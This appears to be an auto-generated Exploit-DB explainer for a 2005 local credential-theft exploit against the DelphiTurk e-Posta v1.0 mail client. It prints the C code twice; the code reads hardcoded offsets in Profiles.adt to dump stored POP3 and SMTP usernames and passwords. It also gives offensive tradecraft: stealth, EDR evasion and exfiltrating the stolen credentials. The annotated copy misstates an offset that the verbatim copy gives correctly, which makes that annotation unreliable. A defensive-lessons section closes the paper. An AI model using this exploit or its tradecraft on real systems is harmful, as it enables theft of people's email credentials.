By exploitdb papers bot•February 10, 2005•
papers
DelphiTurk e-Posta v1.0 Credential Recovery Exploit Explained
DelphiTurk e-Posta v1.0 Credential Recovery Exploit Explained
What this paper is
This paper details a local exploit for DelphiTurk e-Posta version 1.0. The vulnerability allows a local user to read sensitive email account credentials (usernames, passwords, server information) stored by the application. The exploit code provided demonstrates how to access and display these stored credentials by directly reading from the application's configuration file.
Simple technical breakdown
The DelphiTurk e-Posta application stores user profile information, including email account credentials, in a file named Profiles.adt. This file is located within the application's installation directory. The exploit works by:
- Locating the application directory: It queries the Windows Registry to find the default "Program Files" directory.
- Constructing the configuration file path: It appends the specific path to the
Profiles.adtfile based on the known installation structure of DelphiTurk e-Posta v1.0. - Reading specific offsets: It opens the
Profiles.adtfile and reads data from predefined byte offsets and lengths. These offsets correspond to where different pieces of credential information are stored within the file. - Displaying credentials: The extracted data is then printed to the console as readable strings.
Essentially, it's a file parsing exploit that leverages hardcoded offsets to extract sensitive data.
Complete code and payload walkthrough
The provided C code is a local exploit that targets DelphiTurk e-Posta v1.0. It doesn't contain traditional shellcode or a remote payload in the sense of executing arbitrary commands. Instead, its "payload" is the act of reading and displaying the stored credentials.
/*****************************************************************
DelphiTurk e-Posta v1.0 Local Exploit by Kozan
Application: DelphiTurk e-Posta v1.0
Procuder: Delphiturk.com
Vulnerable Description: DelphiTurk e-Posta v1.0 discloses
passwords to local users.
Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <stdio.h>
#include <windows.h>
HKEY hKey; // Handle for Windows Registry key
#define BUFSIZE 100 // Define a buffer size for file paths
char prgfiles[BUFSIZE]; // Buffer to store the program files directory path
DWORD dwBufLen=BUFSIZE; // Variable to store the actual length of the retrieved registry value
LONG lRet; // Variable to store the return status of registry operations
char *bilgi_oku(int adres,int uzunluk) // Function to read data from the configuration file
{
// Attempt to open the registry key for Windows CurrentVersion
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
// Query the "ProgramFilesDir" value from the registry
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen); // Store the retrieved path in prgfiles
// Check if the registry query was successful and the buffer was large enough
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey); // Close the registry key
printf("An error occured!"); // Print an error message
return 0; // Return NULL (or 0 as char*) indicating failure
}
RegCloseKey(hKey); // Close the registry key
}else{
printf("An error occured!\n"); // Print an error if opening the key failed
exit(1); // Exit the program
}
// Construct the full path to the DelphiTurk e-Posta settings file
strcat(prgfiles,"\\Delphi Turk\\Delphi Türk e-Posta\n1.0\\Settings\\Profiles.adt"); // Note: The newline character here is likely a typo in the original source and might cause issues.
int i; // Loop counter
FILE *fp; // File pointer
char ch[100]; // Buffer to store read characters
if((fp=fopen(prgfiles,"rb")) == NULL) // Attempt to open the configuration file in binary read mode
{
return "false"; // If file cannot be opened, return the string "false"
}
fseek(fp,adres,0); // Move the file pointer to the specified 'adres' (offset)
for(i=0;i<uzunluk;i++) // Read 'uzunluk' (length) number of characters
ch[i]=getc(fp); // Read one character at a time and store it in 'ch'
ch[i]=NULL; // Null-terminate the string 'ch'
fclose(fp); // Close the file
return ch; // Return the read string
}
int main() // Main function where execution begins
{
// Print banner and credits
printf("\r\n\r\nDelphiTurk e-Posta v1.0 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \r\n\r\n");
printf("This example exploit only shows the first record.\r\n");
printf("You may improve it freely...\r\n\r\n");
// Call bilgi_oku to retrieve and print various profile details
// Each call specifies a starting offset and a length to read from Profiles.adt
printf("ProfileName : %s\n",bilgi_oku(3609,25)); // Reads Profile Name
printf("Profile UserName : %s\n",bilgi_oku(3634,50)); // Reads Profile Username
printf("Profile MailAddress : %s\n",bilgi_oku(3684,40)); // Reads Profile Email Address
printf("Pop3 Mail Server : %s\n",bilgi_oku(3724,52)); // Reads POP3 Mail Server
printf("Pop3 UserName : %s\n",bilgi_oku(3776,50)); // Reads POP3 Username
printf("Pop3 Password : %s\n",bilgi_oku(3776,50)); // Reads POP3 Password (Note: This offset seems to be a typo, likely intended to be 3826 as per the next line)
printf("Smtp Mail Server : %s\n",bilgi_oku(3976,52)); // Reads SMTP Mail Server
printf("Smtp UserName : %s\n",bilgi_oku(3928,50)); // Reads SMTP Username
printf("Smtp Password : %s\n",bilgi_oku(3978,46)); // Reads SMTP Password
return 0; // Indicate successful execution
}
// milw0rm.com [2005-02-10]Code Fragment/Block -> Practical Purpose Mapping:
#include <stdio.h>,#include <windows.h>: Standard C library for input/output and Windows API functions.HKEY hKey;: A handle to a registry key, used for interacting with the Windows Registry.#define BUFSIZE 100: Defines a constant for buffer size, used for storing file paths.char prgfiles[BUFSIZE];: A character array to store the path to the program files directory and the configuration file.DWORD dwBufLen=BUFSIZE;: A variable to hold the size of data retrieved from the registry.LONG lRet;: A variable to store the return status of Windows API calls, particularly registry operations.char *bilgi_oku(int adres,int uzunluk): This is the core function.- Purpose: To read a specific number of bytes (
uzunluk) starting from a given offset (adres) within theProfiles.adtconfiguration file. - Inputs:
adres(integer, byte offset),uzunluk(integer, number of bytes to read). - Behavior:
- Opens the registry key
SOFTWARE\Microsoft\Windows\CurrentVersion. - Queries the
ProgramFilesDirvalue to get the base directory for installed programs. - Constructs the full path to
Profiles.adtby appending the known subdirectory structure. - Attempts to open
Profiles.adtin binary read mode ("rb"). - If the file is opened successfully, it uses
fseekto move to the specifiedadres. - It then reads
uzunlukcharacters into a local bufferch. - The buffer
chis null-terminated. - The file is closed.
- Opens the registry key
- Output: Returns a pointer to the null-terminated string read from the file, or the string
"false"if the file cannot be opened. Returns0(NULL) if registry operations fail.
- Purpose: To read a specific number of bytes (
RegOpenKeyEx(...): Opens a specified registry key.RegQueryValueEx(...): Retrieves the data and type of a specified registry value.strcat(prgfiles,"\\Delphi Turk\\Delphi Türk e-Posta\n1.0\\Settings\\Profiles.adt");: Concatenates strings to form the full path to the target configuration file. Note: The newline character\nwithin the string is highly unusual and likely a typo in the original source. This could lead to the file not being found if the actual path doesn't contain a newline.fopen(prgfiles,"rb"): Opens the file specified byprgfilesin binary read mode.fseek(fp,adres,0): Sets the file position indicator for the stream pointed to byfpto a byte offset relative to the beginning of the file (when0is used as the third argument).getc(fp): Reads the next character from the specified stream and returns it as an unsigned char cast to an int.ch[i]=NULL;: Null-terminates the character arraych, making it a C-style string.fclose(fp): Closes the specified stream and disassociates it from the buffer.main(): The entry point of the program.- Purpose: To orchestrate the credential recovery process by calling
bilgi_okuwith specific offsets and lengths and then printing the results. - Behavior: Prints introductory messages, then calls
bilgi_okumultiple times with hardcoded offsets and lengths to extract and display various email account settings. - Output: Prints the extracted profile information to the console.
- Purpose: To orchestrate the credential recovery process by calling
printf(...): Standard C function for formatted output to the console.
Shellcode/Payload Segments:
There is no traditional shellcode or executable payload in this C code. The "payload" is the execution of the C program itself, which reads from a local file and prints sensitive information. The exploit's success relies entirely on the hardcoded offsets within the Profiles.adt file.
Practical details for offensive operations teams
- Required Access Level: Local Administrator or any user account with read permissions to the DelphiTurk e-Posta installation directory and the Windows Registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion. Typically, any standard user can read this registry key. - Lab Preconditions:
- A target Windows machine with DelphiTurk e-Posta v1.0 installed.
- The
Profiles.adtfile must exist in the expected location (<ProgramFilesDir>\Delphi Turk\Delphi Türk e-Posta 1.0\Settings\Profiles.adt). - The target machine must have the necessary C runtime libraries to execute the compiled C code.
- Tooling Assumptions:
- A C compiler (like MinGW or Visual Studio) to compile the exploit code on the target or a staging machine.
- The compiled executable can be transferred to the target system.
- Alternatively, if the C source code is available on the target, it can be compiled directly on the target if a compiler is present.
- Execution Pitfalls:
- Typo in Path: The newline character (
\n) instrcat(prgfiles,"\\Delphi Turk\\Delphi Türk e-Posta\n1.0\\Settings\\Profiles.adt");is a significant risk. If the actual installation path does not contain a newline, the file will not be found, and the exploit will fail. This needs to be corrected tostrcat(prgfiles,"\\Delphi Turk\\Delphi Türk e-Posta 1.0\\Settings\\Profiles.adt");. - Application Not Installed: The exploit will fail if DelphiTurk e-Posta v1.0 is not installed or is installed in a non-standard location.
- File Corruption/Different Version: If the
Profiles.adtfile is corrupted or if a different version of the application is installed, the hardcoded offsets will be incorrect, leading to garbage data or program crashes. - Registry Permissions: While unlikely for
ProgramFilesDir, extremely restrictive registry permissions could prevent the exploit from finding the installation path. - Antivirus/EDR: Antivirus software might flag the executable for suspicious file access patterns or registry queries, although the nature of the exploit (reading local files) is less likely to trigger generic heuristics compared to remote code execution.
- Typo in Path: The newline character (
- Tradecraft Considerations:
- Stealth: Executing a compiled C program is generally less stealthy than using scripting languages. However, the program's function is to read local files, which might not immediately raise alarms unless monitored closely.
- Persistence: This exploit is not designed for persistence. It's a one-time credential extraction tool.
- Privilege Escalation: This is a local exploit, not a privilege escalation exploit. It requires existing user access.
- Data Exfiltration: The extracted credentials would need to be exfiltrated separately, for example, by piping the output to a file and then transferring it, or by embedding the output into a larger exfiltration mechanism.
Where this was used and when
- Context: This exploit targets a specific, older version of an email client (DelphiTurk e-Posta v1.0). Its primary use case would have been by individuals or groups seeking to gain unauthorized access to email accounts managed by this software.
- Timeframe: Published on February 10, 2005. This indicates the vulnerability existed and was exploited around or before this date. Such vulnerabilities are typically discovered and disclosed when the software is in active use. Given its age, the software is likely obsolete, and the vulnerability is no longer relevant in modern environments unless legacy systems are still in use.
Defensive lessons for modern teams
- Secure Configuration Storage: Sensitive credentials should never be stored in plain text or easily parseable formats in configuration files. Encryption, hashing, or secure credential management systems (like Windows Credential Manager or dedicated secrets management tools) are essential.
- Input Validation and Sanitization: While not directly applicable to this file-parsing exploit, the principle of validating and sanitizing all inputs (including file paths and data read from files) is crucial to prevent vulnerabilities.
- Regular Software Updates: Keeping all software, including email clients and operating systems, up-to-date is paramount. Patches often fix vulnerabilities like this.
- Principle of Least Privilege: Users and applications should only have the minimum permissions necessary to perform their functions. Restricting read access to sensitive configuration files and registry keys can mitigate the impact of such exploits.
- File Integrity Monitoring (FIM): Monitoring critical configuration files for unauthorized modifications or access can help detect exploitation attempts.
- Endpoint Detection and Response (EDR): Modern EDR solutions can detect suspicious file access patterns, registry queries, and the execution of unknown executables, potentially flagging this type of activity.
- Hardcoded Offsets are Fragile: Relying on fixed offsets within files is a brittle design. Software developers should avoid this and use structured data formats with clear delimiters or metadata.
ASCII visual (if applicable)
This exploit is a direct file access mechanism. A visual representation of the file structure would be most relevant, but without the actual Profiles.adt file and its internal structure, a detailed diagram is not possible. However, we can visualize the process of finding the file:
+-----------------------+ +--------------------------------------+
| Target Machine | | Windows Registry |
| | | |
| +-------------------+ | | HKEY_LOCAL_MACHINE |
| | Exploit Executable| | --> | SOFTWARE |
| +-------------------+ | | Microsoft |
| | | Windows |
| | | CurrentVersion |
| | | "ProgramFilesDir" = "C:\Program Files\" |
| | +--------------------------------------+
| |
| | +--------------------------------------+
| | | File System |
| | | |
| | | C:\Program Files\ |
| | | Delphi Turk\ |
| | | Delphi Türk e-Posta 1.0\ |
| | | Settings\ |
| | | Profiles.adt <--------------+
| | | (Contains credentials) |
| | +--------------------------------------+
+-----------------------+Explanation:
- The exploit executable runs on the target machine.
- It queries the Windows Registry to find the
ProgramFilesDir. - It constructs the full path to
Profiles.adtusing the retrieved directory and hardcoded subdirectories. - It opens and reads specific byte offsets from
Profiles.adt.
Source references
- PAPER ID: 811
- PAPER TITLE: DelphiTurk e-Posta 1.0 - Credential Recover
- AUTHOR: Kozan
- PUBLISHED: 2005-02-10
- KEYWORDS: Windows,local
- PAPER URL: https://www.exploit-db.com/papers/811
- RAW URL: https://www.exploit-db.com/raw/811
Original Exploit-DB Content (Verbatim)
/*****************************************************************
DelphiTurk e-Posta v1.0 Local Exploit by Kozan
Application: DelphiTurk e-Posta v1.0
Procuder: Delphiturk.com
Vulnerable Description: DelphiTurk e-Posta v1.0 discloses
passwords to local users.
Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com
*****************************************************************/
#include <stdio.h>
#include <windows.h>
HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;
char *bilgi_oku(int adres,int uzunluk)
{
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
0,
KEY_QUERY_VALUE,
&hKey) == ERROR_SUCCESS)
{
lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
(LPBYTE) prgfiles, &dwBufLen);
if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
RegCloseKey(hKey);
printf("An error occured!");
return 0;
}
RegCloseKey(hKey);
}else{
printf("An error occured!\n");
exit(1);
}
strcat(prgfiles,"\\Delphi Turk\\Delphi Türk e-Posta
1.0\\Settings\\Profiles.adt");
int i;
FILE *fp;
char ch[100];
if((fp=fopen(prgfiles,"rb")) == NULL)
{
return "false";
}
fseek(fp,adres,0);
for(i=0;i<uzunluk;i++)
ch[i]=getc(fp);
ch[i]=NULL;
fclose(fp);
return ch;
}
int main()
{
printf("\r\n\r\nDelphiTurk e-Posta v1.0 Local Exploit by Kozan\n");
printf("Credits to ATmaCA\n");
printf("www.netmagister.com - www.spyinstructors.com \r\n\r\n");
printf("This example exploit only shows the first record.\r\n");
printf("You may improve it freely...\r\n\r\n");
printf("ProfileName : %s\n",bilgi_oku(3609,25));
printf("Profile UserName : %s\n",bilgi_oku(3634,50));
printf("Profile MailAddress : %s\n",bilgi_oku(3684,40));
printf("Pop3 Mail Server : %s\n",bilgi_oku(3724,52));
printf("Pop3 UserName : %s\n",bilgi_oku(3776,50));
printf("Pop3 Password : %s\n",bilgi_oku(3826,50));
printf("Smtp Mail Server : %s\n",bilgi_oku(3976,52));
printf("Smtp UserName : %s\n",bilgi_oku(3928,50));
printf("Smtp Password : %s\n",bilgi_oku(3978,46));
return 0;
}
// milw0rm.com [2005-02-10]